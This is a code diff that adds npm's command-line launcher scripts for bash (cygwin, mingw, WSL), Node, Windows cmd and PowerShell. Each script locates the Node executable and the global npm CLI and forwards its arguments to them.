+ #!/usr/bin/env bash
2
+
3
+ # This is used by the Node.js installer, which expects the cygwin/mingw
4
+ # shell script to already be present in the npm dependency folder.
5
+
6
+ (set -o igncr) 2>/dev/null && set -o igncr; # cygwin encoding fix
7
+
8
+ basedir=`dirname "$0"`
9
+
10
+ case `uname` in
11
+ *CYGWIN*) basedir=`cygpath -w "$basedir"`;;
12
+ esac
13
+
14
+ if [ `uname` = 'Linux' ] && type wslpath &>/dev/null ; then
15
+ IS_WSL="true"
16
+ fi
17
+
18
+ function no_node_dir {
19
+ # if this didn't work, then everything else below will fail
20
+ echo "Could not determine Node.js install directory" >&2
21
+ exit 1
22
+ }
23
+
24
+ NODE_EXE="$basedir/node.exe"
25
+ if ! [ -x "$NODE_EXE" ]; then
26
+ NODE_EXE="$basedir/node"
27
+ fi
28
+ if ! [ -x "$NODE_EXE" ]; then
29
+ NODE_EXE=node
30
+ fi
31
+
32
+ # this path is passed to node.exe, so it needs to match whatever
33
+ # kind of paths Node.js thinks it's using, typically win32 paths.
34
+ CLI_BASEDIR="$("$NODE_EXE" -p 'require("path").dirname(process.execPath)' 2> /dev/null)"
35
+ if [ $? -ne 0 ]; then
36
+ # this fails under WSL 1 so add an additional message. we also suppress stderr above
37
+ # because the actual error raised is not helpful. in WSL 1 node.exe cannot handle
38
+ # output redirection properly. See https://github.com/microsoft/WSL/issues/2370
39
+ if [ "$IS_WSL" == "true" ]; then
40
+ echo "WSL 1 is not supported. Please upgrade to WSL 2 or above." >&2
41
+ fi
42
+ no_node_dir
43
+ fi
44
+ NPM_CLI_JS="$CLI_BASEDIR/node_modules/npm/bin/npm-cli.js"
45
+ NPM_PREFIX=`"$NODE_EXE" "$NPM_CLI_JS" prefix -g`
46
+ if [ $? -ne 0 ]; then
47
+ no_node_dir
48
+ fi
49
+ NPM_PREFIX_NPM_CLI_JS="$NPM_PREFIX/node_modules/npm/bin/npm-cli.js"
50
+
51
+ # a path that will fail -f test on any posix bash
52
+ NPM_WSL_PATH="/.."
53
+
54
+ # WSL can run Windows binaries, so we have to give it the win32 path
55
+ # however, WSL bash tests against posix paths, so we need to construct that
56
+ # to know if npm is installed globally.
57
+ if [ "$IS_WSL" == "true" ]; then
58
+ NPM_WSL_PATH=`wslpath "$NPM_PREFIX_NPM_CLI_JS"`
59
+ fi
60
+ if [ -f "$NPM_PREFIX_NPM_CLI_JS" ] || [ -f "$NPM_WSL_PATH" ]; then
61
+ NPM_CLI_JS="$NPM_PREFIX_NPM_CLI_JS"
62
+ fi
63
+
64
+ "$NODE_EXE" "$NPM_CLI_JS" "$@"
@@ -0,0 +1,2 @@
1
+ #!/usr/bin/env node
2
+ require('../lib/cli.js')(process)
@@ -0,0 +1,19 @@
1
+ :: Created by npm, please don't edit manually.
2
+ @ECHO OFF
3
+
4
+ SETLOCAL
5
+
6
+ SET "NODE_EXE=%~dp0\node.exe"
7
+ IF NOT EXIST "%NODE_EXE%" (
8
+ SET "NODE_EXE=node"
9
+ )
10
+
11
+ SET "NPM_CLI_JS=%~dp0\node_modules\npm\bin\npm-cli.js"
12
+ FOR /F "delims=" %%F IN ('CALL "%NODE_EXE%" "%NPM_CLI_JS%" prefix -g') DO (
13
+ SET "NPM_PREFIX_NPM_CLI_JS=%%F\node_modules\npm\bin\npm-cli.js"
14
+ )
15
+ IF EXIST "%NPM_PREFIX_NPM_CLI_JS%" (
16
+ SET "NPM_CLI_JS=%NPM_PREFIX_NPM_CLI_JS%"
17
+ )
18
+
19
+ "%NODE_EXE%" "%NPM_CLI_JS%" %*
@@ -0,0 +1,35 @@
1
+ #!/usr/bin/env pwsh
2
+ $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent
3
+
4
+ $exe=""
5
+ if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) {
6
+ # Fix case when both the Windows and Linux builds of Node
7
+ # are installed in the same directory
8
+ $exe=".exe"
9
+ }
10
+ $ret=0
11
+
12
+ $nodeexe = "node$exe"
13
+ $nodebin = $(Get-Command $nodeexe -ErrorAction SilentlyContinue -ErrorVariable F).Source
14
+ if ($nodebin -eq $null) {
15
+ Write-Host "$nodeexe not found."
16
+ exit 1
17
+ }
18
+ $nodedir = $(New-Object -ComObject Scripting.FileSystemObject).GetFile("$nodebin").ParentFolder.Path
19
+
20
+ $npmclijs="$nodedir/node_modules/npm/bin/npm-cli.js"
21
+ $npmprefix=(& $nodeexe $npmclijs prefix -g)
22
+ if ($LASTEXITCODE -ne 0) {
23
+ Write-Host "Could not determine Node.js install directory"
24
+ exit 1
25
+ }
26
+ $npmprefixclijs="$npmprefix/node_modules/npm/bin/npm-cli.js"
27
+
28
+ # Support pipeline input
29
+ if ($MyInvocation.ExpectingInput) {
30
+ $input | & $nodeexe $npmprefixclijs $args
31
+ } else {
32
+ & $nodeexe $npmprefixclijs $args
33
+ }
34
+ $ret=$LASTEXITCODE
35
+ exit $ret